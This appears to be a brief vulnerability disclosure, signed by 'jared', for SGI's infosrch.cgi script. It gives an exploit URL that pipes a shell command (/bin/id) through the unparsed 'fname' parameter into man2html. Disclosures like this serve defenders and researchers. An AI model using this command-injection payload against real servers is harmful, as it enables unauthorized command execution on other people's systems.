Exploit:
    http://expensive.sgi.box/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id

    no parsing is done on the 'fname' variable before being
    passed to man2html. (i.e. when cmd is 'getdoc' and db is 'man').

                           jared (rpc@inetarena.com)